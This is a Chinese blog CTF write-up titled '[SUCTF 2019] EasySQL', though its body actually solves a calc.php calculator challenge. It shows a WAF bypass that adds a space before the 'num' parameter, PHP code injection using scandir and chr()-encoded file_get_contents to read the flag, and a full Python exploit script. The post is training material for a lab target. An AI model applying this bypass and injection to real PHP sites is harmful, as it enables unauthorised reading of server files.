CTF_EXP03: [SUCTF 2019] EasySQL

最新推荐文章于 2024-04-06 14:16:08 发布
最新推荐文章于 2024-04-06 14:16:08 发布
阅读量260 收藏 1
点赞数
分类专栏: CTF_EXP编写 文章标签: exp 安全 python SUCTF 2019 EasySQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109055832
版权

CTF_EXP03: [SUCTF 2019] EasySQL

启动靶机,打开页面:
在这里插入图片描述
一个简单的计算器页面,查看网页源码:
在这里插入图片描述
提示设置了WAF以确保安全,尝试访问calc.php
在这里插入图片描述
得到了WAF源码,分析代码:

  1. 需要传入变量num的值
  2. 设置了一系列黑名单的值
  3. 如果传入的变量num中有黑名单包括的符号,将终止程序
  4. 否则将输出num的内容

根据PHP的解析规则:如果变量前面有空格,会去掉前面的空格再解析

WAF限制了参数num,将传入的参数'num'前添加空格,即'? num'可绕过WAF的判断,将字符/使用char(47)表示:

? num=1;var_dump(scandir(chr(47)))

在这里插入图片描述
在返回的文件中有f1agg文件,将其转化为ASCII编码,使用file_get_contents()函数读取文件:

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述
得到flag

EXP如下:

# -*- coding:utf-8 -*-
# name: Meng
# mail: 614886708@qq.com
# ctf_exp03: [SUCTF 2019] EasySQL

import requests
import re


class Calculator:
    def __init__(self, url_input):
        # 对输入的url做补全与检验
        self.url = url_input
        if self.url.endswith('/'):
            self.url = url_input + 'calc.php'
        elif re.compile(r".*[0-9]$").match(self.url):
            self.url = url_input + '/calc.php'
        elif self.url.endswith('calc.php'):
            pass
        else:
            print('链接有误! 请重试!')
            exit()

        self.flag = ''      # flag
        self.s = requests.Session()

    def bypass_waf(self):
        # 如果传入的变量num中有黑名单包括的符号,将终止程序,否则将输出num的内容
        # PHP的解析规则:如果变量前面有空格,会去掉前面的空格再解析
        # 根据规则构造传参
        while True:
            try:
                # 查看文件列表回显
                source_dir = self.s.get(self.url + '? num=1;var_dump(scandir(chr(47)))').text
                if re.search(r'f1agg', source_dir).group() is None:
                    print('未发现文件列表回显! 请检查重试!')
                    exit()

                # 使用 file_get_contents() 函数读取文件
                data = '? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))'
                source_flag = self.s.get(self.url + data).text
                self.flag = re.search(r'flag\{.+\}', source_flag).group()

            except:
                print('未发现flag! 请重试!')
                exit()
            else:
                break

    def run(self):
        self.bypass_waf()
        return self.flag


if __name__ == '__main__':
    print('ctf_exp03: [SUCTF 2019] EasySQL')
    url_input = input('请输入题目链接:')
    print(Calculator(url_input).run())
    input()     # 防止退出cmd

输入题目链接,得到flag:
在这里插入图片描述

Senimo_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
合天网安实验室CTF-Exp200-Come on,Exploit me!
MyCyber
06-21 560
合天网安实验室CTF-Exp200-Come on,Exploit me! 题目描述   Audrey Tang. ⊙.⊙ 我只能说到这儿了 相关附件   exp200 参考解题步骤 1、下载附件先用VSCode打开看看 换个行看看 通过and换行有68行 2、根据题目描述猜测   如果没有接触过perl语言看到这些文本应该会觉得一头雾水,但大体可以看出是用来打印一些东西的。使用搜索引擎搜索题目描述中的Audrey Tang,可以发现其与Perl、ppencode的紧密联系。ppencode是把Per
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
【标题】"i-SOON_CTF_2019:2019第二届安洵杯过渡环境"指的是2019年举办的第二届安洵杯网络安全竞赛中的一个环节,这个环节涉及到了过渡环境的设置与使用。CTF(Capture The Flag)是网络安全领域常见的竞赛形式,...
CTF_EXP01:BugkuCTF 秋名山老司机
Senimo
10-11 443
CTF_EXP 第一周ctf_exp01: BugkuCTF 秋名山老司机ctf_exp02: XCTF PHP2ctf_exp03: [SUCTF 2019] EasySQL 第一周入门EXP,挑选了几道简单的CTF题目上手,主要都是通过Python中的Reques模块进行GET和POST传参,对可能的结果进行限制与筛选,实现输入题目链接即可得到flag。 ctf_exp01: BugkuCTF 秋名山老司机 题目:BugkuCTF 秋名山老司机 提示为通过POST方式传入变量value的值, 构造如下
CTF之计算器
最新发布
qq_74263993的博客
04-06 118
这个题目让你输入验证码,又给你限制长度。直接找到js源码,得到flag。
BugkuCTF 计算器
鱼的博客
01-20 344
打开是让输入式子的值,答案本来是76,但是只能输一位,查看源码。 最大长度为1,我们把这里改为2。 再次输入,成功。 flag{CTF-bugku-0032}
CTF-web-计算器
三天不打上房揭瓦的博客
07-26 1124
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web-计算器 1.输入答案验证 2.发现只能输入一个数字 3.F12或者右键审查元素查找问题,发现长度只能输入1位,右键编辑HTML将其删除。 4.输入数字验证,得到flag flag{CTF-bugku-0032} ...
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
CTF_UNICON2020:netwars平台上托管的UNICON 2020 CTF编写
02-17
CTF_UNICON2020 netwars平台上托管的UNICON 2020 CTF编写UNICON >>> KnowYourPayloads.counterhack.com CTF 招聘人员下载了执行某种恶意软件的resume.doc之后,我们在端点上检测到恶意活动。 我们能够使该端点脱机,...
web ctf中的计算器
weixin_30275415的博客
06-10 1074
web ctf中的计算器 pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b2b2b2;} pre.s...
CTF-Internetwache2016-exp-RemotePrinter
iextract的博客
04-22 424
CTF-Internetwache2016-exp-RemotePrinter 自今天开始在csdn记录下有些感想或是某些解题过程。以前只在csdn查询、下载资料,没有想到记录。 Ps:心态爆炸,这个笔记本动一下卡7秒是什么鬼哦查看给出的二进制文件,file RemotePrinter check.sh --file RemotePrinter RemotePrinter: ELF 3
ctf(入门)bugku 计算器
qq_63875498的博客
11-27 326
ctf(入门)bugku 计算器
CTF Bugku 计算器
m0_50917178的博客
08-18 506
该题目提示计算正确就可以得到flag 但是输入框只能输入一个字符,所以我们需要调整一下它的最大字符长度。 F12后,进到源代码下,找到标签的maxlength属性修改为10(能满足题意即可) 输入正确结果后即可得到flag 第二种解法就是右键查看源代码,找到code.js之后,直接在里面查找flag 本题总结:难度不大,考察的内容是查看源代码的能力和对HTML语言的了解程度。 ...
BugKuCTF WEB 计算器
无限迭代中......
07-07 494
http://123.206.87.240:8002/yanzhengma/ 题解: 工具:开发者工具 直接输入答案发现只能输入一位数字 审查元素 修改HTML
ctf-使用python进行sql布尔盲注exp的编写
qq_51796436的博客
02-28 1805
文章目录exp编写sql注入布尔盲注 exp编写 poc:验证漏洞是否存在的程序 exp:利用exp能够实现漏洞的利用价值 sql注入 本篇需要了解sql注入的原理再食用
CTF学习(入门):Bugku--web篇--计算器
m0_45157173的博客
11-15 825
CTF学习(入门):Bugku–web篇–计算器 题目链接:http://123.206.87.240:8002/yanzhengma/ 涉及操作:读写网页源码 进入目标网页 发现有一个计算题 但是当输入答案时却发现只能输入一位数! 没看到其他提示之类,就去查看源码: 发现在上面标记的那一行上,存在 class=“input” maxlength=“1” 这样一句 推测是它把输入长度限制在了1 于是给他加一位数试试 这时我们再输入计算题答案,发现以经可以输好多位了 而且输入正确答案后,网页就给我们弹
BugKu CTF 计算器 解题思路
m0_73734159的博客
10-12 261
BugKu CTF 计算器 解题思路
[SUCTF 2019]EasySQL
single7_的博客
12-14 196
0x01 思路 根据题目名称判断为 SQL 注入 测试’ or ‘1’='1 发现存在waf。 考虑进行堆叠注入 query=1;select database();# Array ( [0] => 1 ) Array ( [0] => ctf ) query=1;use ctf;show tables;# Array ( [0] => 1 ) Array ( [0] => Flag ) 0x02 flag 使用*,1放入查询语句,即可获得 f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值